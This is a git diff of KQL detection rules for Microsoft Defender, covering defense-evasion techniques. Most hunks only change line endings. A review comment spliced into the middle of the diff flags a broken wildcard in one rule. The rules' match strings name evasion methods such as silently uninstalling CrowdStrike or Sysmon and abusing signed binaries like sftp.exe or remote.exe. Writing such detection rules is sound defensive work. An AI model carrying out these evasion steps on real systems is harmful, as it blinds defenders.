+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
index 1a3263ab..85e794da 100644
--- a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
@@ -1,11 +1,11 @@
-// Title: Uncommon File Creation By Mysql Daemon Process
-// Author: Joseph Kamau
-// Date: 2024-05-27
-// Level: high
-// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
-// Which could be an indicator of "User Defined Functions" abuse to download malware.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceFileEvents
+// Title: Uncommon File Creation By Mysql Daemon Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: high
+// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
+// Which could be an indicator of "User Defined Functions" abuse to download malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
index b3cae963..9e3fa150 100644
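Review bot: The `RegistryKey endswith "\\Control\\Keyboard Layouts*"` predicate on the new side of the IME-file hunk can never match: KQL `endswith` compares literally, so the trailing `*` is a leaked Sigma wildcard rather than a glob, and a real key path does not end in an asterisk, which leaves the rule silently dead. The second predicate, `RegistryKey contains "Ime File"`, looks off as well since "Ime File" is described in the rule's own header as a value name, so on the DeviceRegistryEvents schema it presumably belongs in RegistryValueName rather than the key path — worth confirming against the backend's field mapping. A literal form would be `| where RegistryKey contains "\\Control\\Keyboard Layouts\\" and RegistryValueName =~ "Ime File" and not(RegistryValueData endswith ".ime")`. The hunk appears to re-emit the file unchanged apart from line endings, so the defect is carried over from the conversion rather than introduced here; the same wildcard leak should be checked for across the other regenerated rules.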
--- a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
+++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon FileSystem Load Attempt By Format.com
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-04
-// Level: high
-// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Uncommon FileSystem Load Attempt By Format.com
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
index 1ada023b..70c2b25e 100644
--- a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
@@ -1,14 +1,14 @@
-// Title: Uncommon Link.EXE Parent Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-22
-// Level: medium
-// Description: Detects an uncommon parent process of "LINK.EXE".
-// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
-// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
-// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
-// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Uncommon Link.EXE Parent Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects an uncommon parent process of "LINK.EXE".
+// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
+// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
+// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
+// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
index b6d06909..a462c4d5 100644
--- a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
+++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
@@ -1,12 +1,12 @@
-// Title: Uncommon Outbound Kerberos Connection
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003
-// False Positives:
-// - Web Browsers and third party application might generate similar activity. An initial baseline is required.
-
-DeviceNetworkEvents
+// Title: Uncommon Outbound Kerberos Connection
+// Author: Ilyas Ochkov, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003
+// False Positives:
+// - Web Browsers and third party application might generate similar activity. An initial baseline is required.
+
+DeviceNetworkEvents
 | where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
index 726a5a94..03cd851a 100644
--- a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon Sigverif.EXE Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-
-DeviceProcessEvents
+// Title: Uncommon Sigverif.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
index 5148e8ca..1813d0e3 100644
--- a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon Svchost Parent Process
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-08-15
-// Level: medium
-// Description: Detects an uncommon svchost parent process
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005
-
-DeviceProcessEvents
+// Title: Uncommon Svchost Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-08-15
+// Level: medium
+// Description: Detects an uncommon svchost parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
 | where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
index 7bd9719b..c7808e5d 100644
--- a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
+++ b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
@@ -1,12 +1,12 @@
-// Title: Uninstall Crowdstrike Falcon Sensor
-// Author: frack113
-// Date: 2021-07-12
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated
-
-DeviceProcessEvents
+// Title: Uninstall Crowdstrike Falcon Sensor
+// Author: frack113
+// Date: 2021-07-12
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
index 5dea738a..3589c35f 100644
--- a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
+++ b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
@@ -1,12 +1,12 @@
-// Title: Uninstall Sysinternals Sysmon
-// Author: frack113
-// Date: 2022-01-12
-// Level: high
-// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administrators might use this command to remove Sysmon for debugging purposes
-
-DeviceProcessEvents
+// Title: Uninstall Sysinternals Sysmon
+// Author: frack113
+// Date: 2022-01-12
+// Level: high
+// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrators might use this command to remove Sysmon for debugging purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
index 59fa3860..d67baf90 100644
--- a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
+++ b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Unmount Share Via Net.EXE
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2020-10-08
-// Level: low
-// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.005
-// False Positives:
-// - Administrators or Power users may remove their shares via cmd line
-
-DeviceProcessEvents
+// Title: Unmount Share Via Net.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2020-10-08
+// Level: low
+// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+// False Positives:
+// - Administrators or Power users may remove their shares via cmd line
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
index ad0992df..703f96e4 100644
--- a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
+++ b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
@@ -1,10 +1,10 @@
-// Title: Use Icacls to Hide File to Everyone
-// Author: frack113
-// Date: 2022-07-18
-// Level: medium
-// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
-
-DeviceProcessEvents
+// Title: Use Icacls to Hide File to Everyone
+// Author: frack113
+// Date: 2022-07-18
+// Level: medium
+// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
index 5b5c1d72..f9359f4f 100644
--- a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
+++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
@@ -1,12 +1,12 @@
-// Title: Use NTFS Short Name in Command Line
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-05
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
-
-DeviceProcessEvents
+// Title: Use NTFS Short Name in Command Line
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
index f6793daf..c8eaec20 100644
--- a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
+++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
@@ -1,12 +1,12 @@
-// Title: Use NTFS Short Name in Image
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-06
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Software Installers
-
-DeviceProcessEvents
+// Title: Use NTFS Short Name in Image
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-06
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Software Installers
+
+DeviceProcessEvents
 | where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/Defense Evasion/use_of_remote_exe.kql
index 5c626cf3..879e9f91 100644
--- a/KQL/rules/Defense Evasion/use_of_remote_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_remote_exe.kql
@@ -1,12 +1,12 @@
-// Title: Use of Remote.exe
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022-06-02
-// Level: medium
-// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).
-
-DeviceProcessEvents
+// Title: Use of Remote.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-02
+// Level: medium
+// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).
+
+DeviceProcessEvents
 | where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
index d7c98ec2..944937e1 100644
--- a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
@@ -1,12 +1,12 @@
-// Title: Use of Scriptrunner.exe
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-// False Positives:
-// - Legitimate use when App-v is deployed
-
-DeviceProcessEvents
+// Title: Use of Scriptrunner.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Legitimate use when App-v is deployed
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
index 64aa3ad8..416722e3 100644
--- a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
+++ b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
@@ -1,10 +1,10 @@
-// Title: Use Of The SFTP.EXE Binary As A LOLBIN
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-11-10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Use Of The SFTP.EXE Binary As A LOLBIN
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
index e1a365f2..5fe53ce7 100644
--- a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
@@ -1,12 +1,12 @@
-// Title: Use of TTDInject.exe
-// Author: frack113
-// Date: 2022-05-16
-// Level: medium
-// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Use of TTDInject.exe
+// Author: frack113
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
index 4baa59bb..96eafd5f 100644
--- a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
@@ -1,12 +1,12 @@
-// Title: Use of VisualUiaVerifyNative.exe
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022-06-01
-// Level: medium
-// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate testing of Microsoft UI parts.
-
-DeviceProcessEvents
+// Title: Use of VisualUiaVerifyNative.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate testing of Microsoft UI parts.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
index 11a3ceae..75a70dc7 100644
--- a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
@@ -1,10 +1,10 @@
-// Title: Use of VSIISExeLauncher.exe
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-09
-// Level: medium
-// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-
-DeviceProcessEvents
+// Title: Use of VSIISExeLauncher.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql
index c440a601..10806bbe 100644
--- a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql
+++ b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql
@@ -1,12 +1,12 @@
-// Title: Use of Wfc.exe
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022-06-01
-// Level: medium
-// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Legitimate use by a software developer
-
-DeviceProcessEvents
+// Title: Use of Wfc.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use by a software developer
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
index 0b23b5b7..b47db9bf 100644
